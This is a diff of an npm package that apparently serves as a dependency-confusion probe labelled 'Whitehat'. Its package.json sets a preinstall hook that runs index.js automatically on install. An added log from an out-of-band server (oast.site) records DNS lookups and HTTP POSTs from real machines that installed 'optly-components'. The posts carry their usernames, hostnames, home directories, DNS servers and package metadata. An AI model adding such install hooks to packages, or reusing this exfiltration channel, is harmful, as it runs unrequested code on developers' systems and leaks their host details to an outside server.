+ ;; AUTHORITY SECTION:
574
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
575
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
576
+
577
+ ;; ADDITIONAL SECTION:
578
+ ns1.oast.site. 3600 IN A 178.128.16.97
579
+ ns2.oast.site. 3600 IN A 178.128.16.97
580
+
581
+
582
+
583
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 106.37.240.58 at 2022-08-30 23:58:44
584
+ ------------
585
+ HTTP Request
586
+ ------------
587
+
588
+ POST / HTTP/1.1
589
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
590
+ Connection: close
591
+ Connection: close
592
+ Content-Length: 872
593
+ Content-Type: application/x-www-form-urlencoded
594
+
595
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fnpm%2Fnode_modules%2F_optly-components%401.0.0%40optly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22696d8d4089f0%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%22223.5.5.5%22%2C%22114.114.114.114%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%2C%22__npminstall_done%22%3Atrue%2C%22_from%22%3A%22optly-components%401.0.0%22%2C%22_resolved%22%3A%22https%3A%2F%2Fregistry.npmmirror.com%2Foptly-components%2F-%2Foptly-components-1.0.0.tgz%22%7D%7D
596
+
597
+ -------------
598
+ HTTP Response
599
+ -------------
600
+
601
+ HTTP/1.1 200 OK
602
+ Connection: close
603
+ Content-Type: text/html; charset=utf-8
604
+ Server: oast.site
605
+
606
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
607
+
608
+
609
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 8.140.102.230 at 2022-08-30 23:58:47
610
+ -----------
611
+ DNS Request
612
+ -----------
613
+
614
+ ;; opcode: QUERY, status: NOERROR, id: 28028
615
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
616
+
617
+ ;; QUESTION SECTION:
618
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
619
+
620
+ ;; ADDITIONAL SECTION:
621
+
622
+ ;; OPT PSEUDOSECTION:
623
+ ; EDNS: version 0; flags: do; udp: 4096
624
+ ; SUBNET: 1.202.0.0/25/0
625
+
626
+
627
+ ------------
628
+ DNS Response
629
+ ------------
630
+
631
+ ;; opcode: QUERY, status: NOERROR, id: 28028
632
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
633
+
634
+ ;; QUESTION SECTION:
635
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
636
+
637
+ ;; ANSWER SECTION:
638
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
639
+
640
+ ;; AUTHORITY SECTION:
641
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
642
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
643
+
644
+ ;; ADDITIONAL SECTION:
645
+ ns1.oast.site. 3600 IN A 178.128.16.97
646
+ ns2.oast.site. 3600 IN A 178.128.16.97
647
+
648
+
649
+
650
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 106.37.240.58 at 2022-08-30 23:58:50
651
+ ------------
652
+ HTTP Request
653
+ ------------
654
+
655
+ POST / HTTP/1.1
656
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
657
+ Connection: close
658
+ Connection: close
659
+ Content-Length: 872
660
+ Content-Type: application/x-www-form-urlencoded
661
+
662
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fnpm%2Fnode_modules%2F_optly-components%401.0.0%40optly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22696d8d4089f0%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%22223.5.5.5%22%2C%22114.114.114.114%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%2C%22__npminstall_done%22%3Atrue%2C%22_from%22%3A%22optly-components%401.0.0%22%2C%22_resolved%22%3A%22https%3A%2F%2Fregistry.npmmirror.com%2Foptly-components%2F-%2Foptly-components-1.0.0.tgz%22%7D%7D
663
+
664
+ -------------
665
+ HTTP Response
666
+ -------------
667
+
668
+ HTTP/1.1 200 OK
669
+ Connection: close
670
+ Content-Type: text/html; charset=utf-8
671
+ Server: oast.site
672
+
673
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
674
+
675
+
676
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 220.181.151.174 at 2022-08-30 23:58:50
677
+ -----------
678
+ DNS Request
679
+ -----------
680
+
681
+ ;; opcode: QUERY, status: NOERROR, id: 27202
682
+ ;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
683
+
684
+ ;; QUESTION SECTION:
685
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
686
+
687
+
688
+ ------------
689
+ DNS Response
690
+ ------------
691
+
692
+ ;; opcode: QUERY, status: NOERROR, id: 27202
693
+ ;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
694
+
695
+ ;; QUESTION SECTION:
696
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
697
+
698
+ ;; ANSWER SECTION:
699
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
700
+
701
+ ;; AUTHORITY SECTION:
702
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
703
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
704
+
705
+ ;; ADDITIONAL SECTION:
706
+ ns1.oast.site. 3600 IN A 178.128.16.97
707
+ ns2.oast.site. 3600 IN A 178.128.16.97
708
+
709
+
710
+
711
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 106.37.240.58 at 2022-08-30 23:58:53
712
+ ------------
713
+ HTTP Request
714
+ ------------
715
+
716
+ POST / HTTP/1.1
717
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
718
+ Connection: close
719
+ Connection: close
720
+ Content-Length: 872
721
+ Content-Type: application/x-www-form-urlencoded
722
+
723
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fnpm%2Fnode_modules%2F_optly-components%401.0.0%40optly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22696d8d4089f0%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%22223.5.5.5%22%2C%22114.114.114.114%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%2C%22__npminstall_done%22%3Atrue%2C%22_from%22%3A%22optly-components%401.0.0%22%2C%22_resolved%22%3A%22https%3A%2F%2Fregistry.npmmirror.com%2Foptly-components%2F-%2Foptly-components-1.0.0.tgz%22%7D%7D
724
+
725
+ -------------
726
+ HTTP Response
727
+ -------------
728
+
729
+ HTTP/1.1 200 OK
730
+ Connection: close
731
+ Content-Type: text/html; charset=utf-8
732
+ Server: oast.site
733
+
734
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
735
+
736
+
737
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 172.253.10.2 at 2022-08-31 00:00:00
738
+ -----------
739
+ DNS Request
740
+ -----------
741
+
742
+ ;; opcode: QUERY, status: NOERROR, id: 796
743
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
744
+
745
+ ;; QUESTION SECTION:
746
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
747
+
748
+
749
+ ------------
750
+ DNS Response
751
+ ------------
752
+
753
+ ;; opcode: QUERY, status: NOERROR, id: 796
754
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
755
+
756
+ ;; QUESTION SECTION:
757
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
758
+
759
+ ;; ANSWER SECTION:
760
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
761
+
762
+ ;; AUTHORITY SECTION:
763
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
764
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
765
+
766
+ ;; ADDITIONAL SECTION:
767
+ ns1.oast.site. 3600 IN A 178.128.16.97
768
+ ns2.oast.site. 3600 IN A 178.128.16.97
769
+
770
+
771
+
772
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 18.208.52.97 at 2022-08-31 00:00:01
773
+ ------------
774
+ HTTP Request
775
+ ------------
776
+
777
+ POST / HTTP/1.1
778
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
779
+ Connection: close
780
+ Connection: close
781
+ Content-Length: 642
782
+ Content-Type: application/x-www-form-urlencoded
783
+
784
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fl21eDbc82%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Fhome%2Fl21eDbc82%22%2C%22hn%22%3A%22instance%22%2C%22un%22%3A%22l21eDbc82%22%2C%22dns%22%3A%5B%228.8.8.8%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
785
+
786
+ -------------
787
+ HTTP Response
788
+ -------------
789
+
790
+ HTTP/1.1 200 OK
791
+ Connection: close
792
+ Content-Type: text/html; charset=utf-8
793
+ Server: oast.site
794
+
795
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
796
+
797
+
798
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 18.208.52.97 at 2022-08-31 00:00:05
799
+ ------------
800
+ HTTP Request
801
+ ------------
802
+
803
+ POST / HTTP/1.1
804
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
805
+ Connection: close
806
+ Connection: close
807
+ Content-Length: 642
808
+ Content-Type: application/x-www-form-urlencoded
809
+
810
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fl21eDbc82%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Fhome%2Fl21eDbc82%22%2C%22hn%22%3A%22instance%22%2C%22un%22%3A%22l21eDbc82%22%2C%22dns%22%3A%5B%228.8.8.8%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
811
+
812
+ -------------
813
+ HTTP Response
814
+ -------------
815
+
816
+ HTTP/1.1 200 OK
817
+ Connection: close
818
+ Content-Type: text/html; charset=utf-8
819
+ Server: oast.site
820
+
821
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
822
+
823
+
File without changes
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "flight-example-app",
3
+ "version": "1.0.0",
4
+ "description": "Sagaryadav8742 Whitehat",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "sagaryadav8742",
11
+ "license": "ISC"
12
+ }